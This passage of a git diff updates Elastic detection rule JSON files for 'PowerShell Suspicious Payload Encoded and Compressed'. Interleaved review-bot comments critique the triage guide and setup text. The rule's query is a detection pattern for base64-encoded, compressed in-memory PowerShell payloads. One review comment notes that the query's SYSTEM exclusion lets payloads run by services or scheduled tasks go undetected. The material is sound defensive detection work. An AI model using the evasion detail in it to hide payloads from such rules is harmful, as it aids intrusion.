start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and not \n (user.id:(\"S-1-5-18\" or \"S-1-5-19\") and\n file.directory: \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\")\n", "related_integrations": [ { 
@@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_108.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_108.json index 1fab5a63621..bfe545ff74b 100644 --- a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_108.json +++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_108.json 
@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Payload Encoded and Compressed", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and not \n (user.id:(\"S-1-5-18\" or \"S-1-5-19\") and\n file.directory: \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\")\n and not user.id : \"S-1-5-18\"\n", "related_integrations": [ { 
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_109.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_109.json
index 4eb40f76037..239e0712f89 100644
--- a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_109.json
@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Payload Encoded and Compressed", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and\n not file.path: ?\\:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows?Defender?Advanced?Threat?Protection\\\\\\\\Downloads\\\\\\\\* and\n not user.id : \"S-1-5-18\"\n", "related_integrations": [ { 
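Review bot: The new-side `note` line still instructs the analyst to look for 4624 logon events "after the registry modification", yet this rule fires on a PowerShell script block (a compression stream plus `FromBase64String` in `powershell.file.script_block_text`), not on a registry change, so the sentence looks carried over from another guide; suggest `Analysts can do this by searching for login events (for example, 4624) to the target host around the time of the script block execution.` While this line is being touched, note that the context `query` in the same hunk suppresses every script block run as LocalSystem (`not user.id : "S-1-5-18"`), which blinds the rule to payloads launched via services, scheduled tasks or remote-execution tooling that run as SYSTEM; the Defender ATP downloads path is already handled by the preceding `file.path` clause, so the blanket clause is worth narrowing, for example `not (user.id : "S-1-5-18" and file.path : <known benign path>)`. This commit does not change the query, so that part is a follow-up rather than a blocker.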
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_110.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_110.json
index 4c18d4a462c..59c6f858a8d 100644
--- a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_110.json
+++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_110.json
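Review bot: The new-side `setup` string keeps the typo "with with" and labels the GPO path as "Advanced Audit Configuration", but the path it then lists (`Computer Configuration > Administrative Templates > Windows PowerShell`) is an Administrative Template setting, not an Advanced Audit Policy entry, which will send an operator to the wrong console node; suggest `Steps to implement the logging policy via Group Policy:`. The `reg add` fallback on the same line has no `/f`, so it prompts for confirmation when the value already exists and stalls unattended rollouts; appending ` /f` makes it idempotent. Both are wording fixes inside the rule's `setup` text and do not affect the query.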
@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Payload Encoded and Compressed", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 